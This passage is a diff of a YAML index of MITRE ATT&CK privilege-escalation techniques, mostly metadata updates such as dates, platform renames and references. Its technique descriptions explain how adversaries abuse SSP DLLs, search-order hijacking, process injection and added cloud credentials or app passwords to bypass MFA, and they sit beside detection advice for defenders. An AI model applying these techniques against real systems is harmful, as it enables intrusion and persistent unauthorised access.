       x_mitre_contributors:
       - David French, Elastic
       - Bobby, Filar, Elastic
@@ -17675,7 +18003,6 @@ privilege-escalation:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - Windows
       x_mitre_version: '1.2'
@@ -17705,7 +18032,8 @@ privilege-escalation:
         url: https://www.youtube.com/watch?v=nJ0UsyiUEqQ
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      spec_version: '2.1'
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       identifier: T1547.009
     atomic_tests: []
   T1547.005:
@@ -17732,7 +18060,7 @@ privilege-escalation:
         description: Microsoft. (2013, July 31). Configuring Additional LSA Protection.
           Retrieved June 24, 2015.
         source_name: Microsoft Configure LSA
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2020-03-25T15:42:48.910Z'
       name: 'Boot or Logon Autostart Execution: Security Support Provider'
       description: |-
         Adversaries may abuse security support providers (SSPs) to execute DLLs when the system boots. Windows SSP DLLs are loaded into the Local Security Authority (LSA) process at system start. Once loaded into the LSA, SSP DLLs have access to encrypted and plaintext passwords that are stored in Windows, such as any logged-on user's Domain password or smart card PINs.
@@ -17758,13 +18086,11 @@ privilege-escalation:
       - 'Windows Registry: Windows Registry Key Modification'
       x_mitre_permissions_required:
       - Administrator
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1547.005
     atomic_tests: []
   T1543.004:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-03-30T21:01:48.453Z'
       name: 'Create or Modify System Process: Launch Daemon'
       description: |-
         Adversaries may create or modify Launch Daemons to execute malicious payloads as part of persistence. Launch Daemons are plist files used to interact with Launchd, the service management framework used by macOS. Launch Daemons require elevated privileges to install, are executed for every user on a system prior to login, and run in the background without the need for user interaction. During the macOS initialization startup, the launchd process loads the parameters for launch-on-demand system-level daemons from plist files found in <code>/System/Library/LaunchDaemons/</code> and <code>/Library/LaunchDaemons/</code>. Required Launch Daemons parameters include a <code>Label</code> to identify the task, <code>Program</code> to provide a path to the executable, and <code>RunAtLoad</code> to specify when the task is run. Launch Daemons are often used to provide access to shared resources, updates to software, or conduct automation tasks.(Citation: AppleDocs Launch Agent Daemons)(Citation: Methods of Mac Malware Persistence)(Citation: launchd Keywords for plists)
@@ -17841,12 +18167,11 @@ privilege-escalation:
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
-      spec_version: '2.1'
       identifier: T1543.004
     atomic_tests: []
   T1574.008:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2024-09-12T15:25:57.059Z'
       name: 'Hijack Execution Flow: Path Interception by Search Order Hijacking'
       description: |-
         Adversaries may execute their own malicious payloads by hijacking the search order used to load other programs. Because some programs do not call other programs using the full path, adversaries may place their own file in the directory where the calling program is located, causing the operating system to launch their malicious software at the request of the calling program.
@@ -17865,6 +18190,7 @@ privilege-escalation:
         phase_name: defense-evasion
       x_mitre_contributors:
       - Stefan Kanthak
+      x_mitre_deprecated: false
       x_mitre_detection: |
         Monitor file creation for files named after partial directories and in locations that may be searched for common processes through the environment variable, or otherwise should not be user writable. Monitor the executing process for process executable paths that are named for partial directories. Monitor file creation for programs that are named after Windows system programs or programs commonly executed without a path (such as "findstr," "net," and "python"). If this activity occurs outside of known administration activity, upgrades, installations, or patches, then it may be suspicious.
 
@@ -17872,7 +18198,6 @@ privilege-escalation:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - Windows
       x_mitre_version: '1.0'
@@ -17892,34 +18217,36 @@ privilege-escalation:
       id: attack-pattern--58af3705-8740-4c68-9329-ec015a7013c2
       created: '2020-03-13T17:48:58.999Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
       external_references:
       - source_name: mitre-attack
         url: https://attack.mitre.org/techniques/T1574/008
         external_id: T1574.008
+      - source_name: Microsoft Environment Property
+        description: Microsoft. (2011, October 24). Environment Property. Retrieved
+          July 27, 2016.
+        url: https://docs.microsoft.com/en-us/previous-versions//fd7hxfdd(v=vs.85)?redirectedfrom=MSDN
       - source_name: Microsoft CreateProcess
-        description: Microsoft. (n.d.). CreateProcess function. Retrieved December
-          5, 2014.
-        url: http://msdn.microsoft.com/en-us/library/ms682425
+        description: Microsoft. (n.d.). CreateProcess function. Retrieved September
+          12, 2024.
+        url: https://learn.microsoft.com/en-us/windows/win32/api/processthreadsapi/nf-processthreadsapi-createprocessa
+      - source_name: Microsoft WinExec
+        description: Microsoft. (n.d.). WinExec function. Retrieved September 12,
+          2024.
+        url: https://learn.microsoft.com/en-us/windows/win32/api/winbase/nf-winbase-winexec
       - source_name: Windows NT Command Shell
         description: Tim Hill. (2014, February 2). The Windows NT Command Shell. Retrieved
           December 5, 2014.
         url: https://docs.microsoft.com/en-us/previous-versions//cc723564(v=technet.10)?redirectedfrom=MSDN#XSLTsection127121120120
-      - source_name: Microsoft WinExec
-        description: Microsoft. (n.d.). WinExec function. Retrieved December 5, 2014.
-        url: http://msdn.microsoft.com/en-us/library/ms687393
-      - source_name: Microsoft Environment Property
-        description: Microsoft. (2011, October 24). Environment Property. Retrieved
-          July 27, 2016.
-        url: https://docs.microsoft.com/en-us/previous-versions//fd7hxfdd(v=vs.85)?redirectedfrom=MSDN
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
-      spec_version: '2.1'
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       identifier: T1574.008
     atomic_tests: []
   T1484.001:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2024-09-23T22:11:01.884Z'
       name: 'Domain Policy Modification: Group Policy Modification'
       description: "Adversaries may modify Group Policy Objects (GPOs) to subvert
         the intended discretionary access controls for a domain, usually with the
@@ -17955,6 +18282,10 @@ privilege-escalation:
         phase_name: defense-evasion
       - kill_chain_name: mitre-attack
         phase_name: privilege-escalation
+      x_mitre_contributors:
+      - Itamar Mizrahi, Cymptom
+      - Tristan Bennett, Seamless Intelligence
+      x_mitre_deprecated: false
       x_mitre_detection: |-
         It is possible to detect GPO modifications by monitoring directory service changes using Windows event logs. Several events may be logged for such GPO modifications, including:
 
@@ -17966,16 +18297,12 @@ privilege-escalation:
 
 
         GPO abuse will often be accompanied by some other behavior such as [Scheduled Task/Job](https://attack.mitre.org/techniques/T1053), which will have events associated with it to detect. Subsequent permission value modifications, like those to SeEnableDelegationPrivilege, can also be searched for in events associated with privileges assigned to new logons (Event ID 4672) and assignment of user rights (Event ID 4704).
-      x_mitre_platforms:
-      - Windows
-      x_mitre_is_subtechnique: true
-      x_mitre_deprecated: false
       x_mitre_domains:
       - enterprise-attack
+      x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - Windows
       x_mitre_version: '1.0'
-      x_mitre_contributors:
-      - Itamar Mizrahi, Cymptom
-      - Tristan Bennett, Seamless Intelligence
       x_mitre_data_sources:
       - 'Command: Command Execution'
       - 'Active Directory: Active Directory Object Creation'
@@ -18011,12 +18338,12 @@ privilege-escalation:
         url: https://wald0.com/?p=179
       - source_name: Harmj0y Abusing GPO Permissions
         description: Schroeder, W. (2016, March 17). Abusing GPO Permissions. Retrieved
-          March 5, 2019.
-        url: http://www.harmj0y.net/blog/redteaming/abusing-gpo-permissions/
+          September 23, 2024.
+        url: https://blog.harmj0y.net/redteaming/abusing-gpo-permissions/
       - source_name: Harmj0y SeEnableDelegationPrivilege Right
         description: Schroeder, W. (2017, January 10). The Most Dangerous User Right
-          You (Probably) Have Never Heard Of. Retrieved March 5, 2019.
-        url: http://www.harmj0y.net/blog/activedirectory/the-most-dangerous-user-right-you-probably-have-never-heard-of/
+          You (Probably) Have Never Heard Of. Retrieved September 23, 2024.
+        url: https://blog.harmj0y.net/activedirectory/the-most-dangerous-user-right-you-probably-have-never-heard-of/
       - source_name: TechNet Group Policy Basics
         description: 'srachui. (2012, February 13). Group Policy Basics – Part 1:
           Understanding the Structure of a Group Policy Object. Retrieved March 5,
@@ -18024,14 +18351,13 @@ privilege-escalation:
         url: https://blogs.technet.microsoft.com/musings_of_a_technical_tam/2012/02/13/group-policy-basics-part-1-understanding-the-structure-of-a-group-policy-object/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1484.001
     atomic_tests: []
   T1078.001:
     technique:
-      modified: '2024-03-07T14:27:04.770Z'
+      modified: '2024-10-14T22:11:30.271Z'
       name: 'Valid Accounts: Default Accounts'
       description: |-
         Adversaries may obtain and abuse credentials of a default account as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Default accounts are those that are built-into an OS, such as the Guest or Administrator accounts on Windows systems. Default accounts also include default factory/provider set accounts on other types of systems, software, or devices, including the root user account in AWS and the default service account in Kubernetes.(Citation: Microsoft Local Accounts Feb 2019)(Citation: AWS Root User)(Citation: Threat Matrix for Kubernetes)
@@ -18046,6 +18372,7 @@ privilege-escalation:
         phase_name: privilege-escalation
       - kill_chain_name: mitre-attack
         phase_name: initial-access
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_deprecated: false
       x_mitre_detection: Monitor whether default accounts have been activated or logged
         into. These audits should also include checks on any appliances and applications
@@ -18054,18 +18381,18 @@ privilege-escalation:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: true
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - Windows
-      - Azure AD
-      - Office 365
       - SaaS
       - IaaS
       - Linux
       - macOS
-      - Google Workspace
       - Containers
       - Network
-      x_mitre_version: '1.3'
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '1.4'
       x_mitre_data_sources:
       - 'Logon Session: Logon Session Creation'
       - 'User Account: User Account Authentication'
@@ -18097,9 +18424,6 @@ privilege-escalation:
         url: https://www.microsoft.com/security/blog/2020/04/02/attack-matrix-kubernetes/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.2.0
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1078.001
     atomic_tests: []
   T1547.003:
@@ -18171,7 +18495,6 @@ privilege-escalation:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1547.003
     atomic_tests: []
   T1546.005:
@@ -18198,7 +18521,7 @@ privilege-escalation:
         url: https://bash.cyberciti.biz/guide/Trap_statement
         description: Cyberciti. (2016, March 29). Trap statement. Retrieved May 21,
           2019.
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2020-03-24T16:43:02.273Z'
       name: 'Event Triggered Execution: Trap'
       description: |-
         Adversaries may establish persistence by executing malicious content triggered by an interrupt signal. The <code>trap</code> command allows programs and shells to specify commands that will be executed upon receiving interrupt signals. A common situation is a script allowing for graceful termination and handling of common keyboard interrupts like <code>ctrl+c</code> and <code>ctrl+d</code>.
@@ -18224,13 +18547,11 @@ privilege-escalation:
       x_mitre_permissions_required:
       - User
       - Administrator
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1546.005
     atomic_tests: []
   T1574.006:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-03-30T21:01:40.146Z'
       name: 'Hijack Execution Flow: LD_PRELOAD'
       description: "Adversaries may execute their own malicious payloads by hijacking
         environment variables the dynamic linker uses to load shared libraries. During
@@ -18351,12 +18672,11 @@ privilege-escalation:
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
-      spec_version: '2.1'
       identifier: T1574.006
     atomic_tests: []
   T1548:
     technique:
-      modified: '2024-04-15T20:52:09.908Z'
+      modified: '2024-10-15T15:32:21.811Z'
       name: Abuse Elevation Control Mechanism
       description: 'Adversaries may circumvent mechanisms designed to control elevate
         privileges to gain higher-level permissions. Most modern systems contain native
@@ -18388,11 +18708,10 @@ privilege-escalation:
       - Linux
       - macOS
       - Windows
-      - Office 365
       - IaaS
-      - Google Workspace
-      - Azure AD
-      x_mitre_version: '1.3'
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '1.4'
       x_mitre_data_sources:
       - 'Process: Process Creation'
       - 'User Account: User Account Modification'
@@ -18433,11 +18752,10 @@ privilege-escalation:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1134.002:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-04-11T21:14:37.714Z'
       name: Create Process with Token
       description: |-
         Adversaries may create a new process with an existing token to escalate privileges and bypass access controls. Processes can be created with the token and resulting security context of another user using features such as <code>CreateProcessWithTokenW</code> and <code>runas</code>.(Citation: Microsoft RunAs)
@@ -18493,12 +18811,11 @@ privilege-escalation:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1134.002
     atomic_tests: []
   T1548.001:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-03-15T18:43:20.995Z'
       name: 'Abuse Elevation Control Mechanism: Setuid and Setgid'
       description: |-
         An adversary may abuse configurations where an application has the setuid or setgid bits set in order to get code running in a different (and possibly more privileged) user’s context. On Linux or macOS, when the setuid or setgid bits are set for an application binary, the application will run with the privileges of the owning user or group respectively.(Citation: setuid man page) Normally an application is run in the current user’s context, regardless of which user or group owns the application. However, there are instances where programs need to be executed in an elevated context to function properly, but the user running them may not have the specific required privileges.
@@ -18555,7 +18872,6 @@ privilege-escalation:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1548.001
     atomic_tests: []
   T1547.004:
@@ -18625,7 +18941,6 @@ privilege-escalation:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1547.004
     atomic_tests: []
   T1098.004:
@@ -18735,7 +19050,6 @@ privilege-escalation:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1098.004
     atomic_tests: []
   T1546.012:
@@ -18789,7 +19103,7 @@ privilege-escalation:
         description: Symantec. (2008, June 28). Trojan.Ushedix. Retrieved December
           18, 2017.
         source_name: Symantec Ushedix June 2008
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2020-11-10T18:29:31.112Z'
       name: 'Event Triggered Execution: Image File Execution Options Injection'
       description: |-
         Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by Image File Execution Options (IFEO) debuggers. IFEOs enable a developer to attach a debugger to an application. When a process is created, a debugger present in an application’s IFEO will be prepended to the application’s name, effectively launching the new process under the debugger (e.g., <code>C:\dbg\ntsd.exe -g  notepad.exe</code>). (Citation: Microsoft Dev Blog IFEO Mar 2010)
@@ -18822,13 +19136,11 @@ privilege-escalation:
       x_mitre_permissions_required:
       - Administrator
       - SYSTEM
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1546.012
     atomic_tests: []
   T1548.005:
     technique:
-      modified: '2024-03-28T15:30:09.313Z'
+      modified: '2024-10-15T16:07:49.519Z'
       name: Temporary Elevated Cloud Access
       description: "Adversaries may abuse permission configurations that allow them
         to gain temporarily elevated access to cloud resources. Many cloud environments
@@ -18890,10 +19202,9 @@ privilege-escalation:
       x_mitre_is_subtechnique: true
       x_mitre_platforms:
       - IaaS
-      - Azure AD
-      - Office 365
-      - Google Workspace
-      x_mitre_version: '1.1'
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '1.2'
       x_mitre_data_sources:
       - 'User Account: User Account Modification'
       type: attack-pattern
@@ -18951,7 +19262,6 @@ privilege-escalation:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1055.013:
     technique:
@@ -18993,7 +19303,7 @@ privilege-escalation:
         description: Microsoft. (n.d.). PsSetCreateProcessNotifyRoutine routine. Retrieved
           December 20, 2017.
         source_name: Microsoft PsSetCreateProcessNotifyRoutine routine
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-02-09T15:43:48.848Z'
       name: Process Doppelgänging
       description: "Adversaries may inject malicious code into process via process
         doppelgänging in order to evade process-based defenses as well as possibly
@@ -19052,8 +19362,6 @@ privilege-escalation:
       - Administrator
       - SYSTEM
       - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1574.005:
     technique:
@@ -19083,7 +19391,7 @@ privilege-escalation:
         description: 'Stefan Kanthak. (2015, December 8). Executable installers are
           vulnerable^WEVIL (case 7): 7z*.exe allows remote code execution with escalation
           of privilege. Retrieved December 4, 2014.'
-      modified: '2020-10-27T14:49:39.188Z'
+      modified: '2020-03-26T19:20:23.030Z'
       name: Executable Installer File Permissions Weakness
       description: |-
         Adversaries may execute their own malicious payloads by hijacking the binaries used by an installer. These processes may automatically execute specific binaries as part of their functionality or to perform other actions. If the permissions on the file system directory containing a target binary, or permissions on the binary itself, are improperly set, then the target binary may be overwritten with another binary using user-level permissions and executed by the original process. If the original process and thread are running under a higher permissions level, then the replaced binary will also execute under higher-level permissions, which could include SYSTEM.
@@ -19118,12 +19426,10 @@ privilege-escalation:
       - Administrator
       - User
       - SYSTEM
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1546.008:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-04-21T12:33:18.602Z'
       name: 'Event Triggered Execution: Accessibility Features'
       description: |-
         Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by accessibility features. Windows contains accessibility features that may be launched with a key combination before a user has logged in (ex: when the user is on the Windows logon screen). An adversary can modify the way these programs are launched to get a command prompt or backdoor without logging in to the system.
@@ -19200,7 +19506,6 @@ privilege-escalation:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1546.008
     atomic_tests: []
   T1055.004:
@@ -19239,7 +19544,7 @@ privilege-escalation:
           A Technical Survey Of Common And Trending Process Injection Techniques.
           Retrieved December 7, 2017.'
         source_name: Elastic Process Injection July 2017
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-10-18T12:23:46.476Z'
       name: 'Process Injection: Asynchronous Procedure Call'
       description: "Adversaries may inject malicious code into processes via the asynchronous
         procedure call (APC) queue in order to evade process-based defenses as well
@@ -19288,8 +19593,6 @@ privilege-escalation:
       x_mitre_defense_bypassed:
       - Application control
       - Anti-virus
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1055.004
     atomic_tests: []
   T1546.009:
@@ -19321,7 +19624,7 @@ privilege-escalation:
         description: Microsoft. (2007, October 24). Windows Sysinternals - AppCertDlls.
           Retrieved December 18, 2017.
         source_name: Sysinternals AppCertDlls Oct 2007
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2020-11-10T18:29:31.052Z'
       name: 'Event Triggered Execution: AppCert DLLs'
       description: "Adversaries may establish persistence and/or elevate privileges
         by executing malicious content triggered by AppCert DLLs loaded into processes.
@@ -19369,13 +19672,11 @@ privilege-escalation:
       x_mitre_effective_permissions:
       - Administrator
       - SYSTEM
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1546.009
     atomic_tests: []
   T1098.005:
     technique:
-      modified: '2023-10-03T17:38:39.065Z'
+      modified: '2024-09-25T20:39:53.597Z'
       name: Device Registration
       description: "Adversaries may register a device to an adversary-controlled account.
         Devices may be registered in a multifactor authentication (MFA) system, which
@@ -19388,16 +19689,16 @@ privilege-escalation:
         FireEye SolarWinds) In some cases, the MFA self-enrollment process may require
         only a username and password to enroll the account's first device or to enroll
         a device to an inactive account. (Citation: Mandiant APT29 Microsoft 365 2022)\n\nSimilarly,
-        an adversary with existing access to a network may register a device to Azure
-        AD and/or its device management system, Microsoft Intune, in order to access
+        an adversary with existing access to a network may register a device to Entra
+        ID and/or its device management system, Microsoft Intune, in order to access
         sensitive data or resources while bypassing conditional access policies.(Citation:
         AADInternals - Device Registration)(Citation: AADInternals - Conditional Access
-        Bypass)(Citation: Microsoft DEV-0537) \n\nDevices registered in Azure AD may
+        Bypass)(Citation: Microsoft DEV-0537) \n\nDevices registered in Entra ID may
         be able to conduct [Internal Spearphishing](https://attack.mitre.org/techniques/T1534)
         campaigns via intra-organizational emails, which are less likely to be treated
         as suspicious by the email client.(Citation: Microsoft - Device Registration)
         Additionally, an adversary may be able to perform a [Service Exhaustion Flood](https://attack.mitre.org/techniques/T1499/002)
-        on an Azure AD tenant by registering a large number of devices.(Citation:
+        on an Entra ID tenant by registering a large number of devices.(Citation:
         AADInternals - BPRT)"
       kill_chain_phases:
       - kill_chain_name: mitre-attack
@@ -19409,16 +19710,16 @@ privilege-escalation:
       - Mike Moran
       - Joe Gumke, U.S. Bank
       - Arad Inbar, Fidelis Security
+      - Arun Seelagan, CISA
       x_mitre_deprecated: false
       x_mitre_detection: ''
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: true
       x_mitre_platforms:
-      - Azure AD
       - Windows
-      - SaaS
-      x_mitre_version: '1.2'
+      - Identity Provider
+      x_mitre_version: '1.3'
       x_mitre_data_sources:
       - 'Application Log: Application Log Content'
       - 'Active Directory: Active Directory Object Creation'
@@ -19473,7 +19774,6 @@ privilege-escalation:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1055.002:
     technique:
@@ -19496,7 +19796,7 @@ privilege-escalation:
           A Technical Survey Of Common And Trending Process Injection Techniques.
           Retrieved December 7, 2017.'
         source_name: Elastic Process Injection July 2017
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-10-18T12:21:11.178Z'
       name: 'Process Injection: Portable Executable Injection'
       description: "Adversaries may inject portable executables (PE) into processes
         in order to evade process-based defenses as well as possibly elevate privileges.
@@ -19540,8 +19840,6 @@ privilege-escalation:
       - Application control
       x_mitre_permissions_required:
       - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1055.002
     atomic_tests: []
   T1547.015:
@@ -19618,7 +19916,7 @@ privilege-escalation:
         url: https://developer.apple.com/library/archive/documentation/General/Reference/InfoPlistKeyReference/Articles/LaunchServicesKeys.html#//apple_ref/doc/uid/TP40009250-SW1
         description: Apple. (2018, June 4). Launch Services Keys. Retrieved October
           5, 2021.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-10-18T16:36:37.042Z'
       name: 'Boot or Logon Autostart Execution: Login Items'
       description: |-
         Adversaries may add login items to execute upon user login to gain persistence or escalate privileges. Login items are applications, documents, folders, or server connections that are automatically launched when a user logs in.(Citation: Open Login Items Apple) Login items can be added via a shared file list or Service Management Framework.(Citation: Adding Login Items) Shared file list login items can be set using scripting languages such as [AppleScript](https://attack.mitre.org/techniques/T1059/002), whereas the Service Management Framework uses the API call <code>SMLoginItemSetEnabled</code>.
@@ -19646,8 +19944,6 @@ privilege-escalation:
       - 'File: File Modification'
       x_mitre_permissions_required:
       - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1547.015
     atomic_tests: []
   T1134.001:
@@ -19706,23 +20002,22 @@ privilege-escalation:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1134.001
     atomic_tests: []
   T1098.001:
     technique:
-      modified: '2024-02-28T14:35:00.862Z'
+      modified: '2024-10-14T22:11:30.271Z'
       name: 'Account Manipulation: Additional Cloud Credentials'
       description: "Adversaries may add adversary-controlled credentials to a cloud
         account to maintain persistent access to victim accounts and instances within
         the environment.\n\nFor example, adversaries may add credentials for Service
         Principals and Applications in addition to existing legitimate credentials
-        in Azure AD.(Citation: Microsoft SolarWinds Customer Guidance)(Citation: Blue
-        Cloud of Death)(Citation: Blue Cloud of Death Video) These credentials include
-        both x509 keys and passwords.(Citation: Microsoft SolarWinds Customer Guidance)
-        With sufficient permissions, there are a variety of ways to add credentials
-        including the Azure Portal, Azure command line interface, and Azure or Az
-        PowerShell modules.(Citation: Demystifying Azure AD Service Principals)\n\nIn
+        in Azure / Entra ID.(Citation: Microsoft SolarWinds Customer Guidance)(Citation:
+        Blue Cloud of Death)(Citation: Blue Cloud of Death Video) These credentials
+        include both x509 keys and passwords.(Citation: Microsoft SolarWinds Customer
+        Guidance) With sufficient permissions, there are a variety of ways to add
+        credentials including the Azure Portal, Azure command line interface, and
+        Azure or Az PowerShell modules.(Citation: Demystifying Azure AD Service Principals)\n\nIn
         infrastructure-as-a-service (IaaS) environments, after gaining access through
         [Cloud Accounts](https://attack.mitre.org/techniques/T1078/004), adversaries
         may generate or import their own SSH keys using either the <code>CreateKeyPair</code>
@@ -19732,11 +20027,15 @@ privilege-escalation:
         usage of the compromised cloud accounts.(Citation: Expel IO Evil in AWS)(Citation:
         Expel Behind the Scenes)\n\nAdversaries may also use the <code>CreateAccessKey</code>
         API in AWS or the <code>gcloud iam service-accounts keys create</code> command
-        in GCP to add access keys to an account. If the target account has different
-        permissions from the requesting account, the adversary may also be able to
-        escalate their privileges in the environment (i.e. [Cloud Accounts](https://attack.mitre.org/techniques/T1078/004)).(Citation:
+        in GCP to add access keys to an account. Alternatively, they may use the <code>CreateLoginProfile</code>
+        API in AWS to add a password that can be used to log into the AWS Management
+        Console for [Cloud Service Dashboard](https://attack.mitre.org/techniques/T1538).(Citation:
+        Permiso Scattered Spider 2023)(Citation: Lacework AI Resource Hijacking 2024)
+        If the target account has different permissions from the requesting account,
+        the adversary may also be able to escalate their privileges in the environment
+        (i.e. [Cloud Accounts](https://attack.mitre.org/techniques/T1078/004)).(Citation:
         Rhino Security Labs AWS Privilege Escalation)(Citation: Sysdig ScarletEel
-        2.0) For example, in Azure AD environments, an adversary with the Application
+        2.0) For example, in Entra ID environments, an adversary with the Application
         Administrator role can add a new set of credentials to their application's
         service principal. In doing so the adversary would be able to access the service
         principal’s roles and permissions, which may be different from those of the
@@ -19747,12 +20046,19 @@ privilege-escalation:
         tied to the permissions of the original user account. These temporary credentials
         may remain valid for the duration of their lifetime even if the original account’s
         API credentials are deactivated.\n(Citation: Crowdstrike AWS User Federation
-        Persistence)"
+        Persistence)\n\nIn Entra ID environments with the app password feature enabled,
+        adversaries may be able to add an app password to a user account.(Citation:
+        Mandiant APT42 Operations 2024) As app passwords are intended to be used with
+        legacy devices that do not support multi-factor authentication (MFA), adding
+        an app password can allow an adversary to bypass MFA requirements. Additionally,
+        app passwords may remain valid even if the user’s primary password is reset.(Citation:
+        Microsoft Entra ID App Passwords)"
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: persistence
       - kill_chain_name: mitre-attack
         phase_name: privilege-escalation
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_contributors:
       - Expel
       - Oleg Kolesnikov, Securonix
@@ -19761,6 +20067,7 @@ privilege-escalation:
       - Alex Soler, AttackIQ
       - Dylan Silva, AWS Security
       - Arad Inbar, Fidelis Security
+      - Arun Seelagan, CISA
       x_mitre_deprecated: false
       x_mitre_detection: |-
         Monitor Azure Activity Logs for Service Principal and Application modifications. Monitor for the usage of APIs that create or import SSH keys, particularly by unexpected users or accounts such as the root account.
@@ -19769,13 +20076,16 @@ privilege-escalation:
       x_mitre_domains:
       - enterprise-attack
